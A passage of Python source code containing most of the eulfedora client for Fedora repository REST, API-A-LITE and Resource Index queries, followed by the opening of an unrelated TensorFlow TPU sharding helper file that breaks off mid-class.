        return self._make_request(self.session.post, *args, **kwargs)
    def delete(self, *args, **kwargs):
        """HTTP DELETE via :meth:`_make_request`."""
        return self._make_request(self.session.delete, *args, **kwargs)
    # also available: head, patch
class REST_API(HTTP_API_Base):
    """Python object for accessing
    `Fedora's REST API <https://wiki.duraspace.org/display/FEDORA38/REST+API>`_.
    Most methods return an HTTP :class:`requests.models.Response`, which
    provides access to status code and headers as well as content. Many
    responses with XML content can be loaded using models in
    :mod:`eulfedora.xml`.
    """
    # always return xml response instead of html version
    format_xml = {'format': 'xml'}
    ### API-A methods (access) ####
    # describeRepository not implemented in REST, use API-A-LITE version
    def findObjects(self, query=None, terms=None, pid=True, chunksize=None, session_token=None):
        """
        Wrapper function for `Fedora REST API findObjects <http://fedora-commons.org/confluence/display/FCR30/REST+API#RESTAPI-findObjects>`_
        and `Fedora REST API resumeFindObjects <http://fedora-commons.org/confluence/display/FCR30/REST+API#RESTAPI-resumeFindObjects>`_
        One and only one of query or terms must be specified.
        :param query: string of fields and terms to search for
        :param terms: phrase search across all fields
        :param pid: include pid in search results
        :param chunksize: number of objects to return at a time
        :param session_token: get an additional chunk of results from a prior search
        :param parse: optional data parser function; defaults to returning
            raw string data
        :rtype: :class:`requests.models.Response`
        """
        # NOTE: only guards against *both* query and terms being supplied;
        # passing neither is not checked here and is left for Fedora to reject
        if query is not None and terms is not None:
            raise Exception("Cannot findObject with both query ('%s') and terms ('%s')" % (query, terms))
        http_args = {'resultFormat': 'xml'}
        if query is not None:
            http_args['query'] = query
        if terms is not None:
            http_args['terms'] = terms
        if pid:
            http_args['pid'] = 'true'
        if session_token:
            http_args['sessionToken'] = session_token
        if chunksize:
            http_args['maxResults'] = chunksize
        return self.get('objects', params=http_args)
    def getDatastreamDissemination(self, pid, dsID, asOfDateTime=None, stream=False,
                                   head=False, rqst_headers=None):
        """Get a single datastream on a Fedora object; optionally, get the version
        as of a particular date time.
        :param pid: object pid
        :param dsID: datastream id
        :param asOfDateTime: optional datetime; ``must`` be a non-naive datetime
            so it can be converted to a date-time format Fedora can understand
        :param stream: return a streaming response (default: False); use
            is recommended for large datastreams
        :param head: return a HEAD request instead of GET (default: False)
        :param rqst_headers: request headers to be passed through to Fedora,
            such as http range requests
        :rtype: :class:`requests.models.Response`
        """
        # /objects/{pid}/datastreams/{dsID}/content ? [asOfDateTime] [download]
        http_args = {}
        # avoid a mutable default argument for the headers dict
        if rqst_headers is None:
            rqst_headers = {}
        if asOfDateTime:
            http_args['asOfDateTime'] = datetime_to_fedoratime(asOfDateTime)
        url = 'objects/%(pid)s/datastreams/%(dsid)s/content' % \
            {'pid': pid, 'dsid': dsID}
        if head:
            reqmethod = self.head
        else:
            reqmethod = self.get
        return reqmethod(url, params=http_args, stream=stream, headers=rqst_headers)
    # NOTE:
    def getDissemination(self, pid, sdefPid, method, method_params=None):
        '''Get a service dissemination.
        .. NOTE:
            This method not available in REST API until Fedora 3.3
        :param pid: object pid
        :param sDefPid: service definition pid
        :param method: service method name
        :param method_params: method parameters
        :rtype: :class:`requests.models.Response`
        '''
        # /objects/{pid}/methods/{sdefPid}/{method} ? [method parameters]
        if method_params is None:
            method_params = {}
        uri = 'objects/%(pid)s/methods/%(sdefpid)s/%(method)s' % \
            {'pid': pid, 'sdefpid': sdefPid, 'method': method}
        return self.get(uri, params=method_params)
    def getObjectHistory(self, pid):
        '''Get the history for an object in XML format.
        :param pid: object pid
        :rtype: :class:`requests.models.Response`
        '''
        # /objects/{pid}/versions ? [format]
        return self.get('objects/%(pid)s/versions' % {'pid': pid},
                        params=self.format_xml)
    def getObjectProfile(self, pid, asOfDateTime=None):
        """Get top-level information about a single Fedora object; optionally,
        retrieve information as of a particular date-time.
        :param pid: object pid
        :param asOfDateTime: optional datetime; ``must`` be a non-naive datetime
            so it can be converted to a date-time format Fedora can understand
        :rtype: :class:`requests.models.Response`
        """
        # /objects/{pid} ? [format] [asOfDateTime]
        http_args = {}
        if asOfDateTime:
            http_args['asOfDateTime'] = datetime_to_fedoratime(asOfDateTime)
        http_args.update(self.format_xml)
        url = 'objects/%(pid)s' % {'pid': pid}
        return self.get(url, params=http_args)
    def listDatastreams(self, pid):
        """
        Get a list of all datastreams for a specified object.
        Wrapper function for `Fedora REST API listDatastreams <http://fedora-commons.org/confluence/display/FCR30/REST+API#RESTAPI-listDatastreams>`_
        :param pid: string object pid
        :param parse: optional data parser function; defaults to returning
            raw string data
        :rtype: :class:`requests.models.Response`
        """
        # /objects/{pid}/datastreams ? [format, datetime]
        return self.get('objects/%(pid)s/datastreams' % {'pid': pid},
                        params=self.format_xml)
    def listMethods(self, pid, sdefpid=None):
        '''List available service methods.
        :param pid: object pid
        :param sDefPid: service definition pid
        :rtype: :class:`requests.models.Response`
        '''
        # /objects/{pid}/methods ? [format, datetime]
        # /objects/{pid}/methods/{sdefpid} ? [format, datetime]
        ## NOTE: getting an error when sdefpid is specified; fedora issue?
        uri = 'objects/%(pid)s/methods' % {'pid': pid}
        if sdefpid:
            uri += '/' + sdefpid
        return self.get(uri, params=self.format_xml)
    ### API-M methods (management) ####
    def addDatastream(self, pid, dsID, dsLabel=None, mimeType=None, logMessage=None,
                      controlGroup=None, dsLocation=None, altIDs=None, versionable=None,
                      dsState=None, formatURI=None, checksumType=None, checksum=None, content=None):
        '''Add a new datastream to an existing object. On success,
        the return response should have a status of 201 Created;
        if there is an error, the response body includes the error message.
        :param pid: object pid
        :param dsID: id for the new datastream
        :param dslabel: label for the new datastream (optional)
        :param mimeType: mimetype for the new datastream (optional)
        :param logMessage: log message for the object history (optional)
        :param controlGroup: control group for the new datastream (optional)
        :param dsLocation: URL where the content should be ingested from
        :param altIDs: alternate ids (optional)
        :param versionable: configure datastream versioning (optional)
        :param dsState: datastream state (optional)
        :param formatURI: datastream format (optional)
        :param checksumType: checksum type (optional)
        :param checksum: checksum (optional)
        :param content: datastream content, as a file-like object or
            characterdata (optional)
        :rtype: :class:`requests.models.Response`
        '''
        # objects/{pid}/datastreams/NEWDS? [opts]
        # content via multipart file in request content, or dsLocation=URI
        # one of dsLocation or filename must be specified
        # if checksum is sent without checksum type, Fedora seems to
        # ignore it (does not error on invalid checksum with no checksum type)
        if checksum is not None and checksumType is None:
            warnings.warn('Fedora will ignore the checksum (%s) because no checksum type is specified' \
                          % checksum)
        http_args = {}
        if dsLabel:
            http_args['dsLabel'] = dsLabel
        if mimeType:
            http_args['mimeType'] = mimeType
        if logMessage:
            http_args['logMessage'] = logMessage
        if controlGroup:
            http_args['controlGroup'] = controlGroup
        if dsLocation:
            http_args['dsLocation'] = dsLocation
        if altIDs:
            http_args['altIDs'] = altIDs
        if versionable is not None:
            http_args['versionable'] = versionable
        if dsState:
            http_args['dsState'] = dsState
        if formatURI:
            http_args['formatURI'] = formatURI
        if checksumType:
            http_args['checksumType'] = checksumType
        if checksum:
            http_args['checksum'] = checksum
        # Added code to match how content is now handled, see modifyDatastream.
        extra_args = {}
        # could be a string or a file-like object
        if content:
            if hasattr(content, 'read'):    # if content is a file-like object, warn if no checksum
                if not checksum:
                    logger.warning("File was ingested into fedora without a passed checksum for validation, pid was: %s and dsID was: %s.",
                                   pid, dsID)
                extra_args['files'] = {'file': content}
            else:
                # fedora wants a multipart file upload;
                # this seems to work better for handling unicode than
                # simply sending content via requests data parameter
                extra_args['files'] = {'file': ('filename', content)}
        # set content-type header ?
        url = 'objects/%s/datastreams/%s' % (pid, dsID)
        return self.post(url, params=http_args, **extra_args)
        # expected response: 201 Created (on success)
        # when pid is invalid, response body contains error message
        # e.g., no path in db registry for [bogus:pid]
        # return success/failure and any additional information
        # return (r.status_code == requests.codes.created, r.content)
    def addRelationship(self, pid, subject, predicate, object, isLiteral=False,
                        datatype=None):
        """
        Wrapper function for `Fedora REST API addRelationship <https://wiki.duraspace.org/display/FEDORA34/REST+API#RESTAPI-addRelationship>`_
        :param pid: persistent id for the object to add the new relationship to
        :param subject: subject of the relationship; object or datastream URI
        :param predicate: predicate of the new relationship
        :param object: object of the relationship
        :param isLiteral: true if object is literal, false if it is a URI;
            Fedora has no default; this method defaults to False
        :param datatype: optional datatype for literal objects
        :returns: boolean success
        """
        http_args = {'subject': subject, 'predicate': predicate,
                     'object': object, 'isLiteral': isLiteral}
        if datatype is not None:
            http_args['datatype'] = datatype
        url = 'objects/%(pid)s/relationships/new' % {'pid': pid}
        response = self.post(url, params=http_args)
        # Fedora returns 200 OK when the relationship is added
        return response.status_code == requests.codes.ok
    def compareDatastreamChecksum(self, pid, dsID, asOfDateTime=None): # date time
        '''Compare (validate) datastream checksum.  This is a special case of
        :meth:`getDatastream`, with validate checksum set to True.  Fedora
        will recalculate the checksum and compare it to the stored value.
        Response is the same content returned by :meth:`getDatastream`,
        with validation result included in the xml.
        :rtype: :class:`requests.models.Response`
        '''
        # special case of getDatastream, with validateChecksum = true
        # currently returns datastream info returned by getDatastream... what should it return?
        return self.getDatastream(pid, dsID, validateChecksum=True, asOfDateTime=asOfDateTime)
    def export(self, pid, context=None, format=None, encoding=None,
               stream=False):
        '''Export an object to be migrated or archived.
        :param pid: object pid
        :param context: export context, one of: public, migrate, archive
            (default: public)
        :param format: export format (Fedora default is foxml 1.1)
        :param encoding: encoding (Fedora default is UTF-8)
        :param stream: if True, request a streaming response to be
            read in chunks
        :rtype: :class:`requests.models.Response`
        '''
        http_args = {}
        if context:
            http_args['context'] = context
        if format:
            http_args['format'] = format
        if encoding:
            http_args['encoding'] = encoding
        uri = 'objects/%s/export' % pid
        return self.get(uri, params=http_args, stream=stream)
    def getDatastream(self, pid, dsID, asOfDateTime=None, validateChecksum=False):
        """Get information about a single datastream on a Fedora object; optionally,
        get information for the version of the datastream as of a particular date time.
        :param pid: object pid
        :param dsID: datastream id
        :param asOfDateTime: optional datetime; ``must`` be a non-naive datetime
            so it can be converted to a date-time format Fedora can understand
        :param validateChecksum: boolean; if True, request Fedora to recalculate
            and verify the stored checksum against actual data
        :rtype: :class:`requests.models.Response`
        """
        # /objects/{pid}/datastreams/{dsID} ? [asOfDateTime] [format] [validateChecksum]
        http_args = {}
        if validateChecksum:
            # fedora only responds to lower-case validateChecksum option
            http_args['validateChecksum'] = str(validateChecksum).lower()
        if asOfDateTime:
            http_args['asOfDateTime'] = datetime_to_fedoratime(asOfDateTime)
        http_args.update(self.format_xml)
        uri = 'objects/%(pid)s/datastreams/%(dsid)s' % {'pid': pid, 'dsid': dsID}
        return self.get(uri, params=http_args)
    def getDatastreamHistory(self, pid, dsid, format=None):
        '''Get history information for a datastream.
        :param pid: object pid
        :param dsid: datastream id
        :param format: format
        :rtype: :class:`requests.models.Response`
        '''
        http_args = {}
        if format is not None:
            http_args['format'] = format
        # Fedora docs say the url should be:
        #   /objects/{pid}/datastreams/{dsid}/versions
        # In Fedora 3.4.3, that 404s but /history does not
        uri = 'objects/%(pid)s/datastreams/%(dsid)s/history' % \
            {'pid': pid, 'dsid': dsid}
        return self.get(uri, params=http_args)
    # getDatastreams not implemented in REST API
    def getNextPID(self, numPIDs=None, namespace=None):
        """
        Wrapper function for `Fedora REST API getNextPid <http://fedora-commons.org/confluence/display/FCR30/REST+API#RESTAPI-getNextPID>`_
        :param numPIDs: (optional) get the specified number of pids;
            by default, returns 1
        :param namespace: (optional) get the next pid in the specified
            pid namespace; otherwise, Fedora will return the next pid
            in the configured default namespace.
        :rtype: string (if only 1 pid requested) or list of strings (multiple pids)
        """
        http_args = {'format': 'xml'}
        if numPIDs:
            http_args['numPIDs'] = numPIDs
        if namespace:
            http_args['namespace'] = namespace
        rel_url = 'objects/nextPID'
        return self.post(rel_url, params=http_args)
    def getObjectXML(self, pid):
        """Return the entire xml for the specified object.
        :param pid: pid of the object to retrieve
        :rtype: :class:`requests.models.Response`
        """
        # /objects/{pid}/objectXML
        return self.get('objects/%(pid)s/objectXML' % {'pid': pid})
    def getRelationships(self, pid, subject=None, predicate=None, format=None):
        '''Get information about relationships on an object.
        Wrapper function for
        `Fedora REST API getRelationships <https://wiki.duraspace.org/display/FEDORA34/REST+API#RESTAPI-getRelationships>`_
        :param pid: object pid
        :param subject: subject (optional)
        :param predicate: predicate (optional)
        :param format: format
        :rtype: :class:`requests.models.Response`
        '''
        http_args = {}
        if subject is not None:
            http_args['subject'] = subject
        if predicate is not None:
            http_args['predicate'] = predicate
        if format is not None:
            http_args['format'] = format
        url = 'objects/%(pid)s/relationships' % {'pid': pid}
        return self.get(url, params=http_args)
    def ingest(self, text, logMessage=None):
        """Ingest a new object into Fedora. Returns the pid of the new object on success.
        Return response should have a status of 201 Created on success, and
        the content of the response will be the newly created pid.
        Wrapper function for `Fedora REST API ingest <http://fedora-commons.org/confluence/display/FCR30/REST+API#RESTAPI-ingest>`_
        :param text: full text content of the object to be ingested
        :param logMessage: optional log message
        :rtype: :class:`requests.models.Response`
        """
        # NOTE: ingest method supports additional options for
        # label/format/namespace/ownerId, etc - but we generally set
        # those in the foxml that is passed in
        http_args = {}
        if logMessage:
            http_args['logMessage'] = logMessage
        headers = {'Content-Type': 'text/xml'}
        url = 'objects/new'
        # if text is unicode, it needs to be encoded so we can send the
        # data as bytes; otherwise, we get ascii encode errors in httplib/ssl
        if isinstance(text, six.text_type):
            text = bytes(text.encode('utf-8'))
        return self.post(url, data=text, params=http_args, headers=headers)
    def modifyDatastream(self, pid, dsID, dsLabel=None, mimeType=None, logMessage=None, dsLocation=None,
                         altIDs=None, versionable=None, dsState=None, formatURI=None, checksumType=None,
                         checksum=None, content=None, force=False):
        '''Modify an existing datastream, similar to :meth:`addDatastream`.
        Content can be specified by either a URI location or as
        string content or file-like object; if content is not specified,
        datastream metadata will be updated without modifying the content.
        On success, the returned response should have a status code 200;
        on failure, the response body may include an error message.
        :param pid: object pid
        :param dsID: id for the new datastream
        :param dslabel: label for the new datastream (optional)
        :param mimeType: mimetype for the new datastream (optional)
        :param logMessage: log message for the object history (optional)
        :param dsLocation: URL where the content should be ingested from (optional)
        :param altIDs: alternate ids (optional)
        :param versionable: configure datastream versioning (optional)
        :param dsState: datastream state (optional)
        :param formatURI: datastream format (optional)
        :param checksumType: checksum type (optional)
        :param checksum: checksum (optional)
        :param content: datastream content, as a file-like object or
            characterdata (optional)
        :param force: force the update (default: False)
        :rtype: :class:`requests.models.Response`
        '''
        # /objects/{pid}/datastreams/{dsID} ? [dsLocation] [altIDs] [dsLabel]
        #   [versionable] [dsState] [formatURI] [checksumType] [checksum]
        #   [mimeType] [logMessage] [force] [ignoreContent]
        # NOTE: not implementing ignoreContent (unneeded)
        # Unlike addDatastream, if checksum is sent without checksum
        # type, Fedora honors it (*does* error on invalid checksum
        # with no checksum type) - it seems to use the existing
        # checksum type if a new type is not specified.
        http_args = {}
        if dsLabel:
            http_args['dsLabel'] = dsLabel
        if mimeType:
            http_args['mimeType'] = mimeType
        if logMessage:
            http_args['logMessage'] = logMessage
        if dsLocation:
            http_args['dsLocation'] = dsLocation
        if altIDs:
            http_args['altIDs'] = altIDs
        if versionable is not None:
            http_args['versionable'] = versionable
        if dsState:
            http_args['dsState'] = dsState
        if formatURI:
            http_args['formatURI'] = formatURI
        if checksumType:
            http_args['checksumType'] = checksumType
        if checksum:
            http_args['checksum'] = checksum
        if force:
            http_args['force'] = force
        content_args = {}
        if content:
            # content can be either a string or a file-like object
            if hasattr(content, 'read'):    # allow content to be a file
                # warn about missing checksums for files
                if not checksum:
                    logger.warning("Updating datastream %s/%s with a file, but no checksum passed",
                                   pid, dsID)
            # either way (string or file-like object), set content as request data
            # (file-like objects supported in requests as of 0.13.1)
            content_args['data'] = content
        url = 'objects/%s/datastreams/%s' % (pid, dsID)
        return self.put(url, params=http_args, **content_args)
    def modifyObject(self, pid, label, ownerId, state, logMessage=None):
        '''Modify object properties.  Returned response should have
        a status of 200 on success.
        :param pid: object pid
        :param label: object label
        :param ownerId: object owner
        :param state: object state
        :param logMessage: optional log message
        :rtype: :class:`requests.models.Response`
        '''
        # /objects/{pid} ? [label] [ownerId] [state] [logMessage]
        http_args = {'label': label,
                     'ownerId': ownerId,
                     'state': state}
        if logMessage is not None:
            http_args['logMessage'] = logMessage
        url = 'objects/%(pid)s' % {'pid': pid}
        return self.put(url, params=http_args)
        # return r.status_code == requests.codes.ok
    def purgeDatastream(self, pid, dsID, startDT=None, endDT=None, logMessage=None,
                        force=False):
        """Purge a datastream, or specific versions of a datastream, from
        a Fedora object.  On success, response content will include
        a list of timestamps for the purged datastream versions; on failure,
        response content may contain an error message.
        :param pid: object pid
        :param dsID: datastream ID
        :param startDT: optional start datetime (when purging specific versions)
        :param endDT: optional end datetime (when purging specific versions)
        :param logMessage: optional log message
        :rtype: :class:`requests.models.Response`
        """
        # /objects/{pid}/datastreams/{dsID} ? [startDT] [endDT] [logMessage] [force]
        http_args = {}
        if logMessage:
            http_args['logMessage'] = logMessage
        if startDT:
            http_args['startDT'] = startDT
        if endDT:
            http_args['endDT'] = endDT
        if force:
            http_args['force'] = force
        url = 'objects/%(pid)s/datastreams/%(dsid)s' % {'pid': pid, 'dsid': dsID}
        return self.delete(url, params=http_args)
        # as of Fedora 3.4, returns 200 on success with a list of the
        # timestamps for the versions deleted as response content
        # NOTE: response content may be useful on error, e.g.
        #     no path in db registry for [bogus:pid]
        # is there any useful way to pass this info back?
        # *NOTE*: bug when purging non-existent datastream on a valid pid
        # - reported here: http://www.fedora-commons.org/jira/browse/FCREPO-690
        # - as a possible work-around, could return false when status = 200
        #   but response body is an empty list (i.e., no datastreams/versions purged)
        # NOTE: previously returned this
        # return r.status_code == 200, response.read()
    def purgeObject(self, pid, logMessage=None):
        """Purge an object from Fedora.
        Returned response should have a status of 200 on success; response
        content is a timestamp.
        Wrapper function for
        `REST API purgeObject <http://fedora-commons.org/confluence/display/FCR30/REST+API#RESTAPI-purgeObject>`_
        :param pid: pid of the object to be purged
        :param logMessage: optional log message
        :rtype: :class:`requests.models.Response`
        """
        http_args = {}
        if logMessage:
            http_args['logMessage'] = logMessage
        url = 'objects/%(pid)s' % {'pid': pid}
        return self.delete(url, params=http_args)
        # as of Fedora 3.4, returns 200 on success; response content is timestamp
        # return response.status == requests.codes.ok, response.content
    def purgeRelationship(self, pid, subject, predicate, object, isLiteral=False,
                          datatype=None):
        '''Remove a relationship from an object.
        Wrapper function for
        `Fedora REST API purgeRelationship <https://wiki.duraspace.org/display/FEDORA34/REST+API#RESTAPI-purgeRelationship>`_
        :param pid: object pid
        :param subject: relationship subject
        :param predicate: relationship predicate
        :param object: relationship object
        :param isLiteral: boolean (default: false)
        :param datatype: optional datatype
        :returns: boolean; indicates whether or not a relationship was
            removed
        '''
        http_args = {'subject': subject, 'predicate': predicate,
                     'object': object, 'isLiteral': isLiteral}
        if datatype is not None:
            http_args['datatype'] = datatype
        url = 'objects/%(pid)s/relationships' % {'pid': pid}
        response = self.delete(url, params=http_args)
        # should have a status code of 200;
        # response body text indicates if a relationship was purged or not
        return response.status_code == requests.codes.ok and response.content == b'true'
    def setDatastreamState(self, pid, dsID, dsState):
        '''Update datastream state.
        :param pid: object pid
        :param dsID: datastream id
        :param dsState: datastream state
        :returns: boolean success
        '''
        # /objects/{pid}/datastreams/{dsID} ? [dsState]
        http_args = {'dsState' : dsState}
        url = 'objects/%(pid)s/datastreams/%(dsid)s' % {'pid': pid, 'dsid': dsID}
        response = self.put(url, params=http_args)
        # returns response code 200 on success
        return response.status_code == requests.codes.ok
    def setDatastreamVersionable(self, pid, dsID, versionable):
        '''Update datastream versionable setting.
        :param pid: object pid
        :param dsID: datastream id
        :param versionable: boolean
        :returns: boolean success
        '''
        # /objects/{pid}/datastreams/{dsID} ? [versionable]
        http_args = {'versionable': versionable}
        url = 'objects/%(pid)s/datastreams/%(dsid)s' % {'pid': pid, 'dsid': dsID}
        response = self.put(url, params=http_args)
        # returns response code 200 on success
        return response.status_code == requests.codes.ok
    ## utility methods
    def upload(self, data, callback=None, content_type=None,
               size=None):
        '''
        Upload a multi-part file for content to ingest.  Returns a
        temporary upload id that can be used as a datastream location.
        :param data: content string, file-like object, or iterable with
            content to be uploaded
        :param callback: optional callback method to monitor the upload;
            see :mod:`requests-toolbelt` documentation for more
            details: https://toolbelt.readthedocs.org/en/latest/user.html#uploading-data
        :param content_type: optional content type of the data
        :param size: optional size of the data; required when using an
            iterable for the data
        :returns: upload id on success; implicitly returns ``None`` when
            the response status is not 202 Accepted
        '''
        url = 'upload'
        # fedora only expects content uploaded as multipart file;
        # make string content into a file-like object so requests.post
        # sends it the way Fedora expects.
        # NOTE: checking for both python 2.x next method and
        # python 3.x __next__ to test if data is iterable
        if not hasattr(data, 'read') and \
           not (hasattr(data, '__next__') or hasattr(data, 'next')):
            data = six.BytesIO(force_bytes(data))
        # if data is an iterable, wrap in a readable iterator that
        # requests-toolbelt can read data from
        elif not hasattr(data, 'read') and \
             (hasattr(data, '__next__') or hasattr(data, 'next')):
            if size is None:
                raise Exception('Cannot upload iterable with unknown size')
            data = ReadableIterator(data, size)
        # use requests-toolbelt multipart encoder to avoid reading
        # the full content of large files into memory
        menc = MultipartEncoder(fields={'file': ('file', data, content_type)})
        if callback is not None:
            menc = MultipartEncoderMonitor(menc, callback)
        headers = {'Content-Type': menc.content_type}
        if size:
            # latest version of requests requires str or bytes, not int
            if not isinstance(size, six.string_types):
                size = str(size)
            headers['Content-Length'] = size
        try:
            response = self.post(url, data=menc, headers=headers)
        except OverflowError:
            # Python __len__ uses integer so it is limited to system maxint,
            # and requests and requests-toolbelt use len() throughout.
            # This results in an overflow error when trying to upload a file
            # larger than system maxint (2GB on 32-bit OSes).
            # See http://bugs.python.org/issue12159
            msg = 'upload content larger than system maxint (32-bit OS limitation)'
            logger.error('OverflowError: %s', msg)
            raise OverflowError(msg)
        if response.status_code == requests.codes.accepted:
            return response.text.strip()
        # returns 202 Accepted on success
        # content of response should be upload id, if successful
# NOTE: the "LITE" APIs are planned to be phased out; when that happens, these functions
# (or their equivalents) should be available in the REST API
class API_A_LITE(HTTP_API_Base):
    """
    Python object for accessing `Fedora's API-A-LITE <http://fedora-commons.org/confluence/display/FCR30/API-A-LITE>`_.
    .. NOTE::
        As of Fedora 3.4, the previous "LITE" APIs are deprecated;
        this API is maintained because the REST API covers all functionality
        except describeRepository.
    """
    def describeRepository(self):
        """Get information about a Fedora repository.
        :rtype: :class:`requests.models.Response`
        """
        # request the xml flavor of the repository description
        return self.get('describe', params={'xml': 'true'})
class ApiFacade(REST_API, API_A_LITE):
    """Provide access to both :class:`REST_API` and :class:`API_A_LITE`."""
    # as of 3.4, REST API covers everything except describeRepository
    def __init__(self, base_url, username=None, password=None, retries=None):
        """
        :param base_url: base Fedora url
        :param username: optional username for HTTP basic auth
        :param password: optional password for HTTP basic auth
        :param retries: optional retry count passed through to
            :class:`HTTP_API_Base` (previously this facade silently
            dropped the retries option; default ``None`` preserves the
            old behavior)
        """
        HTTP_API_Base.__init__(self, base_url, username, password,
                               retries=retries)
class UnrecognizedQueryLanguage(EnvironmentError):
    """Raised when a query language is not supported by the Resource Index."""
class ResourceIndex(HTTP_API_Base):
    "Python object for accessing Fedora's Resource Index."

    RISEARCH_FLUSH_ON_QUERY = False
    """Specify whether or not RI search queries should specify flush=true to obtain
    the most recent results.  If flush is specified to the query method, that
    takes precedence.

    Irrelevant if Fedora RIsearch is configured with syncUpdates = True.
    """

    def find_statements(self, query, language='spo', type='triples', flush=None,
                        limit=None):
        """
        Run a query in a format supported by the Fedora Resource Index (e.g., SPO
        or Sparql) and return the results.

        :param query: query as a string
        :param language: query language to use; defaults to 'spo'
        :param type: type of query - tuples or triples; defaults to 'triples'
        :param flush: flush results to get recent changes; defaults to False
        :param limit: maximum number of results (only applied to tuples queries)
        :raises ValueError: if type is neither 'triples' nor 'tuples'
        :rtype: :class:`rdflib.ConjunctiveGraph` when type is ``triples``; list
            of dictionaries (keys based on return fields) when type is ``tuples``
        """
        http_args = {
            'type': type,
            'lang': language,
            'query': query,
        }
        if type == 'triples':
            result_format = 'N-Triples'
        elif type == 'tuples':
            result_format = 'CSV'
            if limit is not None:
                http_args['limit'] = limit
        else:
            # FIX: previously any other type fell through with result_format
            # unbound, raising a confusing NameError on the line below.
            raise ValueError(
                "Unsupported query type '%s'; expected 'triples' or 'tuples'"
                % (type,))
        http_args['format'] = result_format
        return self._query(result_format, http_args, flush)

    def count_statements(self, query, language='spo', type='triples',
                         flush=None):
        """
        Run a query in a format supported by the Fedora Resource Index
        (e.g., SPO or Sparql) and return the count of the results.

        :param query: query as a string
        :param language: query language to use; defaults to 'spo'
        :param type: type of query - tuples or triples; defaults to 'triples'
        :param flush: flush results to get recent changes; defaults to False
        :rtype: integer
        """
        result_format = 'count'
        http_args = {
            'type': type,
            'lang': language,
            'query': query,
            'format': result_format
        }
        return self._query(result_format, http_args, flush)

    def _query(self, format, http_args, flush=None):
        """Send a query to the risearch endpoint and parse the response
        according to *format* ('N-Triples', 'CSV', or 'count')."""
        # if flush parameter was not specified, use class setting
        if flush is None:
            flush = self.RISEARCH_FLUSH_ON_QUERY
        http_args['flush'] = 'true' if flush else 'false'

        # log the actual query so it's easier to see what's happening
        logger.debug('risearch query type=%(type)s language=%(lang)s format=%(format)s flush=%(flush)s\n%(query)s',
                     http_args)

        url = 'risearch'
        try:
            start = time.time()
            response = self.get(url, params=http_args)
            data, abs_url = response.content, response.url
            total_time = time.time() - start
            # parse the result according to requested format
            if api_called is not None:
                api_called.send(sender=self.__class__, time_taken=total_time,
                                method='risearch', url='', response=response,
                                args=[], kwargs={'format': format,
                                                 'http_args': http_args,
                                                 'flush': flush})
            if format == 'N-Triples':
                return parse_rdf(data, abs_url, format='n3')
            elif format == 'CSV':
                # reader expects a file or a list; for now, just split the string
                # TODO: when we can return url contents as file-like objects, use that
                return csv.DictReader(response.text.split('\n'))
            elif format == 'count':
                return int(data)
            # should we return the response as fallback?
        except RequestFailed as err:
            if 'Unrecognized query language' in err.detail:
                raise UnrecognizedQueryLanguage(err.detail)
            # could also see 'Unsupported output format'
            else:
                raise err

    def spo_search(self, subject=None, predicate=None, object=None):
        """
        Create and run a subject-predicate-object (SPO) search.  Any search terms
        that are not specified will be replaced as a wildcard in the query.

        :param subject: optional subject to search
        :param predicate: optional predicate to search
        :param object: optional object to search
        :rtype: :class:`rdflib.ConjunctiveGraph`
        """
        spo_query = '%s %s %s' % \
            (self.spoencode(subject), self.spoencode(predicate), self.spoencode(object))
        return self.find_statements(spo_query)

    def spoencode(self, val):
        """
        Encode search terms for an SPO query: None becomes the wildcard '*',
        literals (containing a quote) pass through, URIs are angle-bracketed.

        :param val: string to be encoded
        :rtype: string
        """
        if val is None:
            return '*'
        elif "'" in val:    # FIXME: need better handling for literal strings
            return val
        else:
            return '<%s>' % (val,)

    def get_subjects(self, predicate, object):
        """
        Search for all subjects related to the specified predicate and object.

        :param predicate: predicate to match
        :param object: object to match
        :rtype: generator of subject URI strings
        """
        for statement in self.spo_search(predicate=predicate, object=object):
            yield str(statement[0])

    def get_predicates(self, subject, object):
        """
        Search for all predicates related to the specified subject and object.

        :param subject: subject to match
        :param object: object to match
        :rtype: generator of predicate URI strings
        """
        for statement in self.spo_search(subject=subject, object=object):
            yield str(statement[1])

    def get_objects(self, subject, predicate):
        """
        Search for all objects related to the specified subject and predicate.

        :param subject: subject to match
        :param predicate: predicate to match
        :rtype: generator of object strings
        """
        for statement in self.spo_search(subject=subject, predicate=predicate):
            yield str(statement[2])

    def sparql_query(self, query, flush=None, limit=None):
        """
        Run a Sparql query.

        :param query: sparql query string
        :rtype: list of dictionary
        """
        return self.find_statements(query, language='sparql', type='tuples',
                                    flush=flush, limit=limit)

    def sparql_count(self, query, flush=None):
        """
        Count results for a Sparql query.

        :param query: sparql query string
        :rtype: int
        """
        return self.count_statements(query, language='sparql', type='tuples',
                                     flush=flush)
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Helper library for sharding during TPU compilation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import tensor_shape
# Defaults applied by ShardingPolicy._fill_default_values() when freeze()
# is called before the corresponding value has been set explicitly.
_DEFAULT_NUMBER_OF_SHARDS = 1
_DEFAULT_SHARD_DIMENSION = 0
# TODO(b/36777903) change other parts of tpu.py to use this class.
class ShardingPolicy(object):
  """An object used to hold the sharding policy for a Tensor."""

  def __init__(self):
    # None means "not yet specified"; freeze() fills in module defaults.
    self._number_of_shards = None
    self._shard_dimension = None
    # Once frozen, number_of_shards/shard_dimension can no longer change.
    self._frozen = False

  def __str__(self):
    if self.number_of_shards is None or self.shard_dimension is None:
      return "ShardingPolicy(unset)"
    else:
      return ("ShardingPolicy(%d shards dimension %d)" %
              (self.number_of_shards, self.shard_dimension))

  def _fill_default_values(self):
    # Apply module-level defaults for any value still unset.
    if self._number_of_shards is None:
      self._number_of_shards = _DEFAULT_NUMBER_OF_SHARDS
    if self._shard_dimension is None:
      self._shard_dimension = tensor_shape.as_dimension(
          _DEFAULT_SHARD_DIMENSION)

  def freeze(self):
    """Prevents further modification to the sharding policy.

    Any values that have not been set when freeze is called are set to
    defaults. If the ShardingPolicy is already frozen, this is a NoOp.
    """
    if not self._frozen:
      self._fill_default_values()
      self._frozen = True

  @property
  def number_of_shards(self):
    """Returns the number of shards in the policy or None if unspecified."""
